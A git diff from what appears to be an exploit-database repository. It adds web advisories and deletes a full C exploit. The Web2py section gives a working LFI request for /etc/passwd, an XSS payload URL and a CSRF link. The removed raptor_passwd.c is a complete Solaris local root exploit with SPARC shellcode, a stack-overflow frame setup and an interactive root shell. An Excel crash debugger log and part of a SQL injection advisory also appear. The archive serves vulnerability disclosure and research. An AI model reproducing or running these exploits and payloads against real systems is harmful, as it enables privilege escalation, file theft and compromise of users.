FROM $tbl WHERE "; +if($where=='') $query.='ID='.$clause; +else $query.=$where; +$res = mysql_query($query) or +trigger_error($query.'
'.mysql_error(),E_USER_ERROR); +if(mysql_num_rows($res)>0) return mysql_result($res,0,0); +else return ' '; +} + +Exploit code(s): +=============== + +Run from CL... +*/ + + + +/* +Disclosure Timeline: +=============================== +Vendor Notification: NA +May 14, 2016 : Public Disclosure + +Exploitation Technique: +======================= +Remote + +Severity Level: +================ +High + +Description: +================================================== +Request Method(s): [+] POST + +Vulnerable Product: [+] dns_dhcp Web Interface + +Vulnerable Parameter(s): [+] 'net' +===================================================== + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx +*/ \ No newline at end of file diff --git a/platforms/python/webapps/39821.txt b/platforms/python/webapps/39821.txt new file mode 100755 index 000000000..c550d17e2 --- /dev/null +++ b/platforms/python/webapps/39821.txt @@ -0,0 +1,104 @@ +Title - Web2py 2.14.5 Multiple Vulnerabilities LFI,XSS,CSRF + +# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF +# Reported Date : 2-April-2016 +# Fixed Date : 4-April-2016 +# Exploit Author : Narendra Bhati - https://www.exploit-db.com/author/?a=7638 +# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808 +# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms. +# Fix/Patching : Update To Web2py. 2.14.6 +# Facebook : https://facebook.com/iambhati +# Twitter : http://twitter.com/NarendraBhatiB +# Detailed POC: http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/ +============================================== + + +LFI(Local File Inclusion): CVE-2016-4806 + +POST URI - /admin/default/pack_custom/[applicationmame] + +Vulnerable Parameter = file + +Exploit - file=/etc/passwd + +Authentication Required = Yes(Administrator) + +Steps To Reproduction + +1) HTTP Request + +POST /admin/default/pack_custom/[applicationname] HTTP/1.1 +Host: 127.0.0.1:8000 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad +Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 3213 + +file=/etc/passwd + +2) After sending this request, Application will prompt you with a file to download as an extension of "w2p". + +3) Now we have to unpack this downloaded file using. https://github.com/pigeonflight/web2py-unpacker + +I.e. +Command for unpacking w2p file +python web2py-unpacker.py downloadfile.w2p + +4) This command will create a folder called "unpack", In this folder there will be an another folder of the application of web2py. In this folder you will found the etc folder, Then into this folder you will get the passwd file. + + +Video POC - https://www.youtube.com/watch?v=paCvmHgomP4 + +Full Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/ + +======================================================================== + +Reflected XSS(Cross Site Scripting) : CVE-2016-4807 + +GET URI - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl + +Vulnerable Parameter - source + +Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1) + +Authentication Required - Yes(Administrator) + +Steps To Reproduction + +1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1) + +2) The parameter "source" value will get reflected on the page on "Here" button. + +3) When you will click on that button "Here" XSS payload will get executed. + +Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk + +Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/ + +============================================================================ + + +CSRF(Cross Site Request Forgery): CVE-2016-4808 + +GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname] + +Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname] + +Authenticated Required - Yes(Administrator) + + +Steps To Reproduction + +1) Suppose we have an application in web2py called "testingapp" + +2) An attacker can trick an victim to disable the installed application just By sending this URL to victim - http://127.0.0.1:8000/admin/default/enable/testingapp + +Video POC - https://www.youtube.com/watch?v=d4V8qlNrYtk + +Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/ + diff --git a/platforms/solaris/local/23765.c b/platforms/solaris/local/23765.c deleted file mode 100755 index ccac2809d..000000000 --- a/platforms/solaris/local/23765.c +++ /dev/null @@ -1,574 +0,0 @@ -source: http://www.securityfocus.com/bid/9757/info - -Sun has reported an unspecified vulnerability in the passwd utility on Solaris that may permit local attackers to gain unauthorized root privileges. - -/* - * $Id: raptor_passwd.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ - * - * raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9 - * Copyright (c) 2004 Marco Ivaldi - * - * Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users - * to gain privileges via unknown attack vectors (CAN-2004-0360). - * - * "Those of you lucky enough to have your lives, take them with you. However, - * leave the limbs you've lost. They belong to me now." -- Beatrix Kidd0 - * - * This exploit uses the ret-into-ld.so technique, to effectively bypass the - * non-executable stack protection (noexec_user_stack=1 in /etc/system). The - * exploitation wasn't so straight-forward: sending parameters to passwd(1) - * is somewhat tricky, standard ret-into-stack doesn't seem to work properly - * for some reason (damn SEGV_ACCERR), and we need to bypass a lot of memory - * references before reaching ret. Many thanks to Inode . - * - * Usage: - * $ gcc raptor_passwd.c -o raptor_passwd -ldl -Wall - * $ ./raptor_passwd - * [...] - * # id - * uid=0(root) gid=1(other) egid=3(sys) - * # - * - * Vulnerable platforms: - * Solaris 8 with 108993-14 through 108993-31 and without 108993-32 [tested] - * Solaris 9 without 113476-11 [tested] - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define INFO1 "raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9" -#define INFO2 "Copyright (c) 2004 Marco Ivaldi " - -#define VULN "/usr/bin/passwd" // target vulnerable program -#define BUFSIZE 256 // size of the evil buffer -#define VARSIZE 1024 // size of the evil env var -#define FFSIZE 64 + 1 // size of the fake frame -#define DUMMY 0xdeadbeef // dummy memory address -#define CMD "id;uname -a;uptime;\n" // execute upon exploitation - -/* voodoo macros */ -#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;} -#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;} - -char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */ -/* setuid() */ -"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" -/* execve() */ -"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" -"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" -"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; - -/* globals */ -char *env[256]; -int env_pos = 0, env_len = 0; - -/* prototypes */ -int add_env(char *string); -void check_addr(int addr, char *pattern); -int find_pts(char **slave); -int search_ldso(char *sym); -int search_rwx_mem(void); -void set_val(char *buf, int pos, int val); -void shell(int fd); -int read_prompt(int fd, char *buf, int size); - -/* - * main() - */ -int main(int argc, char **argv) -{ - char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE]; - char platform[256], release[256], cur_pass[256], tmp[256]; - int i, offset, ff_addr, sc_addr, var_addr; - int plat_len, prog_len, rel; - - char *arg[2] = {"foo", NULL}; - int arg_len = 4, arg_pos = 1; - - int pid, cfd, newpts; - char *newpts_str; - - int sb = ((int)argv[0] | 0xffff) & 0xfffffffc; - int ret = search_ldso("strcpy"); - int rwx_mem = search_rwx_mem(); - - /* print exploit information */ - fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); - - /* read command line */ - if (argc != 2) { - fprintf(stderr, "usage: %s current_pass\n\n", argv[0]); - exit(1); - } - sprintf(cur_pass, "%s\n", argv[1]); - - /* get some system information */ - sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); - sysinfo(SI_RELEASE, release, sizeof(release) - 1); - rel = atoi(release + 2); - - /* prepare the evil buffer */ - memset(buf, 'A', sizeof(buf)); - buf[sizeof(buf) - 1] = 0x0; - buf[sizeof(buf) - 2] = '\n'; - - /* prepare the evil env var */ - memset(var, 'B', sizeof(var)); - var[sizeof(var) - 1] = 0x0; - - /* prepare the fake frame */ - bzero(ff, sizeof(ff)); - - /* - * saved %l registers - */ - set_val(ff, i = 0, DUMMY); /* %l0 */ - set_val(ff, i += 4, DUMMY); /* %l1 */ - set_val(ff, i += 4, DUMMY); /* %l2 */ - set_val(ff, i += 4, DUMMY); /* %l3 */ - set_val(ff, i += 4, DUMMY); /* %l4 */ - set_val(ff, i += 4, DUMMY); /* %l5 */ - set_val(ff, i += 4, DUMMY); /* %l6 */ - set_val(ff, i += 4, DUMMY); /* %l7 */ - - /* - * saved %i registers - */ - set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */ - set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */ - set_val(ff, i += 4, DUMMY); /* %i2 */ - set_val(ff, i += 4, DUMMY); /* %i3 */ - set_val(ff, i += 4, DUMMY); /* %i4 */ - set_val(ff, i += 4, DUMMY); /* %i5 */ - set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */ - set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */ - - /* fill the envp, keeping padding */ - ff_addr = add_env(var); /* var must be before ff! */ - sc_addr = add_env(ff); - add_env(sc); - add_env(NULL); - - /* calculate the offset to argv[0] (voodoo magic) */ - plat_len = strlen(platform) + 1; - prog_len = strlen(VULN) + 1; - offset = arg_len + env_len + plat_len + prog_len; - if (rel > 7) - VOODOO64(offset, arg_pos, env_pos) - else - VOODOO32(offset, plat_len, prog_len) - - /* calculate the needed addresses */ - var_addr = sb - offset + arg_len; - ff_addr += var_addr; - sc_addr += var_addr; - - /* set fake frame's %i1 */ - set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */ - - /* check the addresses */ - check_addr(var_addr, "var_addr"); - check_addr(ff_addr, "ff_addr"); - - /* fill the evil buffer */ - for (i = 0; i < BUFSIZE - 4; i += 4) - set_val(buf, i, var_addr); - /* may need to bruteforce the distance here */ - set_val(buf, 112, ff_addr); - set_val(buf, 116, ret - 4); /* strcpy(), after the save */ - - /* fill the evil env var */ - for (i = 0; i < VARSIZE - 4; i += 4) - set_val(var, i, var_addr); - set_val(var, 0, 0xffffffff); /* first byte must be 0xff! */ - - /* print some output */ - fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); - fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); - fprintf(stderr, "Using var address\t: 0x%p\n", (void *)var_addr); - fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); - fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); - fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr); - fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); - - /* find a free pts */ - cfd = find_pts(&newpts_str); - - /* fork() a new process */ - if ((pid = fork()) < 0) { - perror("fork"); - exit(1); - } - - /* parent process */ - if (pid) { - - sleep(1); - - /* wait for password prompt */ - if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) { - fprintf(stderr, "Error: timeout waiting for prompt\n"); - exit(1); - } - if (!strstr(tmp, "ssword: ")) { - fprintf(stderr, "Error: wrong prompt received\n"); - exit(1); - } - - /* send the current password */ - write(cfd, cur_pass, strlen(cur_pass)); - usleep(500000); - - /* wait for password prompt */ - if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) { - fprintf(stderr, "Error: timeout waiting for prompt\n"); - exit(1); - } - if (!strstr(tmp, "ssword: ")) { - fprintf(stderr, "Error: wrong current_pass?\n"); - exit(1); - } - - /* send the evil buffer */ - write(cfd, buf, strlen(buf)); - usleep(500000); - - /* got root? */ - if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) { - fprintf(stderr, "Error: timeout waiting for shell\n"); - exit(1); - } - if (strstr(tmp, "ssword: ")) { - fprintf(stderr, "Error: not vulnerable\n"); - exit(1); - } - if (!strstr(tmp, "# ")) { - fprintf(stderr, "Something went wrong...\n"); - exit(1); - } - - /* semi-interactive shell */ - shell(cfd); - - /* child process */ - } else { - - /* start new session and get rid of controlling terminal */ - if (setsid() < 0) { - perror("setsid"); - exit(1); - } - - /* open the new pts */ - if ((newpts = open(newpts_str, O_RDWR)) < 0) { - perror("open"); - exit(1); - } - - /* ninja terminal emulation */ - ioctl(newpts, I_PUSH, "ptem"); - ioctl(newpts, I_PUSH, "ldterm"); - - /* close the child fd */ - close(cfd); - - /* duplicate stdin */ - if (dup2(newpts, 0) != 0) { - perror("dup2"); - exit(1); - } - - /* duplicate stdout */ - if (dup2(newpts, 1) != 1) { - perror("dup2"); - exit(1); - } - - /* duplicate stderr */ - if (dup2(newpts, 2) != 2) { - perror("dup2"); - exit(1); - } - - /* close the new pts */ - if (newpts > 2) - close(newpts); - - /* run the vulnerable program */ - execve(VULN, arg, env); - perror("execve"); - } - - exit(0); -} - -/* - * add_env(): add a variable to envp and pad if needed - */ -int add_env(char *string) -{ - int i; - - /* null termination */ - if (!string) { - env[env_pos] = NULL; - return(env_len); - } - - /* add the variable to envp */ - env[env_pos] = string; - env_len += strlen(string) + 1; - env_pos++; - - /* pad the envp using zeroes */ - if ((strlen(string) + 1) % 4) - for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { - env[env_pos] = string + strlen(string); - env_len++; - } - - return(env_len); -} - -/* - * check_addr(): check an address for 0x00, 0x04, 0x0a, 0x0d or 0x61-0x7a bytes - */ -void check_addr(int addr, char *pattern) -{ - /* check for NULL byte (0x00) */ - if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || - !(addr & 0xff000000)) { - fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); - exit(1); - } - - /* check for EOT byte (0x04) */ - if (((addr & 0xff) == 0x04) || ((addr & 0xff00) == 0x0400) || - ((addr & 0xff0000) == 0x040000) || - ((addr & 0xff000000) == 0x04000000)) { - fprintf(stderr, "Error: %s contains a 0x04!\n", pattern); - exit(1); - } - - /* check for NL byte (0x0a) */ - if (((addr & 0xff) == 0x0a) || ((addr & 0xff00) == 0x0a00) || - ((addr & 0xff0000) == 0x0a0000) || - ((addr & 0xff000000) == 0x0a000000)) { - fprintf(stderr, "Error: %s contains a 0x0a!\n", pattern); - exit(1); - } - - /* check for CR byte (0x0d) */ - if (((addr & 0xff) == 0x0d) || ((addr & 0xff00) == 0x0d00) || - ((addr & 0xff0000) == 0x0d0000) || - ((addr & 0xff000000) == 0x0d000000)) { - fprintf(stderr, "Error: %s contains a 0x0d!\n", pattern); - exit(1); - } - - /* check for lowercase chars (0x61-0x7a) */ - if ((islower(addr & 0xff)) || (islower((addr & 0xff00) >> 8)) || - (islower((addr & 0xff0000) >> 16)) || - (islower((addr & 0xff000000) >> 24))) { - fprintf(stderr, "Error: %s contains a 0x61-0x7a!\n", pattern); - exit(1); - } -} - -/* - * find_pts(): find a free slave pseudo-tty - */ -int find_pts(char **slave) -{ - int master; - extern char *ptsname(); - - /* open master pseudo-tty device and get new slave pseudo-tty */ - if ((master = open("/dev/ptmx", O_RDWR)) > 0) { - grantpt(master); - unlockpt(master); - *slave = ptsname(master); - return(master); - } - - return(-1); -} - -/* - * search_ldso(): search for a symbol inside ld.so.1 - */ -int search_ldso(char *sym) -{ - int addr; - void *handle; - Link_map *lm; - - /* open the executable object file */ - if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { - perror("dlopen"); - exit(1); - } - - /* get dynamic load information */ - if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { - perror("dlinfo"); - exit(1); - } - - /* search for the address of the symbol */ - if ((addr = (int)dlsym(handle, sym)) == NULL) { - fprintf(stderr, "sorry, function %s() not found\n", sym); - exit(1); - } - - /* close the executable object file */ - dlclose(handle); - - check_addr(addr - 4, sym); - return(addr); -} - -/* - * search_rwx_mem(): search for an RWX memory segment valid for all - * programs (typically, /usr/lib/ld.so.1) using the proc filesystem - */ -int search_rwx_mem(void) -{ - int fd; - char tmp[16]; - prmap_t map; - int addr = 0, addr_old; - - /* open the proc filesystem */ - sprintf(tmp,"/proc/%d/map", (int)getpid()); - if ((fd = open(tmp, O_RDONLY)) < 0) { - fprintf(stderr, "can't open %s\n", tmp); - exit(1); - } - - /* search for the last RWX memory segment before stack (last - 1) */ - while (read(fd, &map, sizeof(map))) - if (map.pr_vaddr) - if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { - addr_old = addr; - addr = map.pr_vaddr; - } - close(fd); - - /* add 4 to the exact address NULL bytes */ - if (!(addr_old & 0xff)) - addr_old |= 0x04; - if (!(addr_old & 0xff00)) - addr_old |= 0x0400; - - return(addr_old); -} - -/* - * set_val(): copy a dword inside a buffer - */ -void set_val(char *buf, int pos, int val) -{ - buf[pos] = (val & 0xff000000) >> 24; - buf[pos + 1] = (val & 0x00ff0000) >> 16; - buf[pos + 2] = (val & 0x0000ff00) >> 8; - buf[pos + 3] = (val & 0x000000ff); -} - -/* - * shell(): semi-interactive shell hack - */ -void shell(int fd) -{ - fd_set fds; - char tmp[128]; - int n; - - /* quote from kill bill: vol. 2 */ - fprintf(stderr, "\"Pai Mei taught you the five point palm exploding heart technique?\" -- Bill\n"); - fprintf(stderr, "\"Of course.\" -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)\n\n"); - - /* execute auto commands */ - write(1, "# ", 2); - write(fd, CMD, strlen(CMD)); - - /* semi-interactive shell */ - for (;;) { - FD_ZERO(&fds); - FD_SET(fd, &fds); - FD_SET(0, &fds); - - if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) { - perror("select"); - break; - } - - /* read from fd and write to stdout */ - if (FD_ISSET(fd, &fds)) { - if ((n = read(fd, tmp, sizeof(tmp))) < 0) { - fprintf(stderr, "Goodbye...\n"); - break; - } - if (write(1, tmp, n) < 0) { - perror("write"); - break; - } - } - - /* read from stdin and write to fd */ - if (FD_ISSET(0, &fds)) { - if ((n = read(0, tmp, sizeof(tmp))) < 0) { - perror("read"); - break; - } - if (write(fd, tmp, n) < 0) { - perror("write"); - break; - } - } - } - - close(fd); - exit(1); -} - -/* - * read_prompt(): non-blocking read from fd - */ -int read_prompt(int fd, char *buf, int size) -{ - fd_set fds; - struct timeval wait; - int n = -1; - - /* set timeout */ - wait.tv_sec = 2; - wait.tv_usec = 0; - - bzero(buf, size); - - FD_ZERO(&fds); - FD_SET(fd, &fds); - - /* select with timeout */ - if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) { - perror("select"); - exit(1); - } - - /* read data if any */ - if (FD_ISSET(fd, &fds)) - n = read(fd, buf, size); - - return n; -} diff --git a/platforms/windows/dos/39819.txt b/platforms/windows/dos/39819.txt new file mode 100755 index 000000000..8ab8a10f7 --- /dev/null +++ b/platforms/windows/dos/39819.txt @@ -0,0 +1,228 @@ +Microsoft Office is prone to a remote denial-of-service vulnerability. + +Attackers can exploit this issue to crash the affected application. +---------------------------------------------------------------------- +Found : 11.05.2016 +More: http://HauntIT.blogspot.com + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39819.zip + +---------------------------------------------------------------------- +Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 +Copyright (c) Microsoft Corporation. All rights reserved. + +CommandLine: "c:\Program Files\Microsoft Office\Office14\excel.EXE" C:\crash\sf_e626c69c89ab9e683eed52eeaaac93ca-109922.xlsx +Symbol search path is: *** Invalid *** +**************************************************************************** +* Symbol loading may be unreliable without a symbol search path. * +* Use .symfix to have the debugger choose a symbol path. * +* After setting your symbol path, use .reload to refresh symbol locations. * +**************************************************************************** +Executable search path is: +ModLoad: 30000000 313d1000 Excel.exe +ModLoad: 7c900000 7c9af000 ntdll.dll +ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll +(...) +ModLoad: 6bdc0000 6be7c000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL +ModLoad: 65100000 6519e000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\USP10.DLL +(cb4.854): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d +eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\OGL.DLL - +OGL!GdipGetImageThumbnail+0x1118e: +44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=???????? + +0:000> r;!exploitable -v;r;ub;kv;q +eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d +eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +OGL!GdipGetImageThumbnail+0x1118e: +44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=???????? + +!exploitable 1.6.0.0 +HostMachine\HostUser +Executing Processor Architecture is x86 +Debuggee is in User Mode +Debuggee is a live user mode debugging session on the local machine +Event Type: Exception +(...) +Exception Faulting Address: 0x4 +First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) +Exception Sub-Type: Read Access Violation + +Faulting Instruction:44175083 push dword ptr [ecx+4] + +Basic Block: + 44175083 push dword ptr [ecx+4] + Tainted Input operands: 'ecx' + 44175086 push dword ptr [ecx] + Tainted Input operands: 'ecx' + 44175088 mov ecx,dword ptr [ebp+8] + 4417508b mov eax,dword ptr [ecx] + 4417508d call dword ptr [eax+4] + Tainted Input operands: 'StackContents' + +Exception Hash (Major/Minor): 0xd8abe4f2.0x3a6d64a1 + + Hash Usage : Stack Trace: +Major+Minor : OGL!GdipGetImageThumbnail+0x1118e +Major+Minor : OGL!GdipGetPathPointsI+0x2da6 +Major+Minor : OGL!GdipGetPathPointsI+0x2b0e +Major+Minor : OGL!GdipGetPathPointsI+0x2a98 +Major+Minor : GDI32!SetMetaRgn+0x87 +Minor : OGL!GdipCreateMetafileFromWmfFile+0x652 +Minor : OGL!GdipGetPathPointsI+0x2d1b +Minor : OGL!GdipGetPathPointsI+0x2b73 +Minor : OGL!GdipCreateMetafileFromWmfFile+0x573 +Minor : OGL!GdipGetVisibleClipBoundsI+0x1c6 +Minor : OGL!GdipDrawImageRectRect+0x111 +Minor : gfx+0x147d74 +Minor : gfx+0x4f9f +Minor : gfx+0x13ec8 +Minor : gfx+0x13ec8 +Minor : gfx+0x13ec8 +Minor : gfx+0x4ecd +Minor : gfx+0xed1a +Minor : gfx+0xecef +Minor : gfx+0xecc3 +Minor : gfx+0xf6fc +Minor : gfx+0xe84d +Minor : gfx+0xf4db +Minor : gfx+0xe84d +Minor : gfx+0xf685 +Minor : gfx+0xe817 +Minor : gfx+0xebd8 +Minor : oart!Ordinal3680+0xb8 +Minor : oart!Ordinal1491+0x156 +Minor : Excel!Ordinal40+0x20d620 +Minor : Excel!Ordinal40+0x1f8e2c +Minor : Excel!Ordinal40+0x60961 +Minor : Excel!Ordinal40+0x607aa +Minor : Excel!Ordinal40+0x5e95b +Minor : Excel!Ordinal40+0x5e76f +Minor : Excel!Ordinal40+0x2f054 +Minor : Excel!Ordinal40+0x1763d +Minor : USER32!GetDC+0x6d +Minor : USER32!GetDC+0x14f +Minor : USER32!IsWindowUnicode+0xa1 +Minor : USER32!CallWindowProcW+0x1b +Minor : Comctl32!Ordinal11+0x328 +Minor : Comctl32!RemoveWindowSubclass+0x17e +Minor : Comctl32!DefSubclassProc+0x46 +Minor : mso!Ordinal1888+0x38e +Minor : mso!Ordinal4894+0x24b +Minor : Comctl32!RemoveWindowSubclass+0x17e +Minor : Comctl32!DefSubclassProc+0xa9 +Minor : USER32!GetDC+0x6d +Minor : USER32!GetDC+0x14f +Minor : USER32!DefWindowProcW+0x180 +Minor : USER32!DefWindowProcW+0x1cc +Minor : ntdll!KiUserCallbackDispatcher+0x13 +Minor : USER32!DispatchMessageW+0xf +Minor : Excel!Ordinal40+0x24572 +Minor : Excel!Ordinal40+0x24441 +Minor : Excel!Ordinal40+0x424b +Minor : Excel!Ordinal40+0x3f0a +Minor : kernel32!RegisterWaitForInputIdle+0x49 +Instruction Address: 0x0000000044175083 + +Description: Read Access Violation near NULL +Short Description: ReadAVNearNull + +Exploitability Classification: PROBABLY_NOT_EXPLOITABLE +Recommended Bug Title: Read Access Violation near NULL starting at OGL!GdipGetImageThumbnail+0x000000000001118e (Hash=0xd8abe4f2.0x3a6d64a1) + +This is a user mode read access violation near null, and is probably not exploitable. +---------------------------------------------------------------------- +More: + +> r +eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d +eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +OGL!GdipGetImageThumbnail+0x1118e: +44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=???????? + +> ub +OGL!GdipGetImageThumbnail+0x1117b: +44175070 8b01 mov eax,dword ptr [ecx] +44175072 ff5004 call dword ptr [eax+4] +44175075 8bc8 mov ecx,eax +44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a) +4417507c 5d pop ebp +4417507d c21000 ret 10h +44175080 55 push ebp +44175081 8bec mov ebp,esp + +> kv +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +0013e3a8 440787db 0ab4aea0 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e +0013e3c8 44078543 0000401d 00000000 00000000 OGL!GdipGetPathPointsI+0x2da6 +0013e3f8 440784cd 0000015c 07915974 07915028 OGL!GdipGetPathPointsI+0x2b0e +0013e410 77f2067f 2f011136 012f2750 07915904 OGL!GdipGetPathPointsI+0x2a98 +0013e490 44074c79 2f011136 404ccccc 4407840d GDI32!SetMetaRgn+0x87 +0013e4c8 44078750 2f011136 3e460aa3 0013e548 OGL!GdipCreateMetafileFromWmfFile+0x652 +0013e568 440785a8 43487fff 3e460aa3 0013e6a0 OGL!GdipGetPathPointsI+0x2d1b +0013e6b8 44074b9a 00000000 42c00000 42c00000 OGL!GdipGetPathPointsI+0x2b73 +0013e7b4 4402cfc4 0ab4a320 00000000 00000000 OGL!GdipCreateMetafileFromWmfFile+0x573 +0013e818 4403e16f 0ab4a320 0013e840 0013e850 OGL!GdipGetVisibleClipBoundsI+0x1c6 +0013e888 438e7d74 00000000 00000000 00000000 OGL!GdipDrawImageRectRect+0x111 +0013e998 437a4f9f 0874a780 07aeec68 ad01865f gfx+0x147d74 +0013ea64 437b3ec8 0874a780 00000001 0722b898 gfx+0x4f9f +0013ea78 437b3ec8 0874a780 00000000 0722b848 gfx+0x13ec8 +0013ea8c 437b3ec8 0874a780 0013eb40 0b06f120 gfx+0x13ec8 +0013eaa0 437a4ecd 0874a780 ad018713 0013ee04 gfx+0x13ec8 +0013eb28 437aed1a 0722b848 0013eb40 0013f194 gfx+0x4ecd +0013eb70 437aecef 0b06f120 0013ebac 0013f194 gfx+0xed1a +0013eb88 437aecc3 086f2410 0013ebac 0013f194 gfx+0xecef +0013ebf4 437af6fc 0013ec80 086f2410 00000002 gfx+0xecc3 +---------------------------------------------------------------------- + +0:000> u eip +OGL!GdipGetImageThumbnail+0x1118e: +44175083 ff7104 push dword ptr [ecx+4] +44175086 ff31 push dword ptr [ecx] +44175088 8b4d08 mov ecx,dword ptr [ebp+8] +4417508b 8b01 mov eax,dword ptr [ecx] +4417508d ff5004 call dword ptr [eax+4] +44175090 8bc8 mov ecx,eax +44175092 e8922bebff call OGL!GdipDeletePen+0x115 (44027c29) +44175097 5d pop ebp + + +0:000> kvn1 + # ChildEBP RetAddr Args to Child +00 0013e308 440787db 08f22870 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e + +0:000> dd ecx+4 +00000004 ???????? ???????? ???????? ???????? +00000014 ???????? ???????? ???????? ???????? +00000024 ???????? ???????? ???????? ???????? +00000034 ???????? ???????? ???????? ???????? +00000044 ???????? ???????? ???????? ???????? +00000054 ???????? ???????? ???????? ???????? +00000064 ???????? ???????? ???????? ???????? +00000074 ???????? ???????? ???????? ???????? + + +0:000> u eip-11 +OGL!GdipGetImageThumbnail+0x1117d: +44175072 ff5004 call dword ptr [eax+4] +44175075 8bc8 mov ecx,eax +44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a) +4417507c 5d pop ebp +4417507d c21000 ret 10h +44175080 55 push ebp +44175081 8bec mov ebp,esp +44175083 ff7104 push dword ptr [ecx+4] <= crash + +OGL!GdipGetImageThumbnail+0x1118e: +44175083 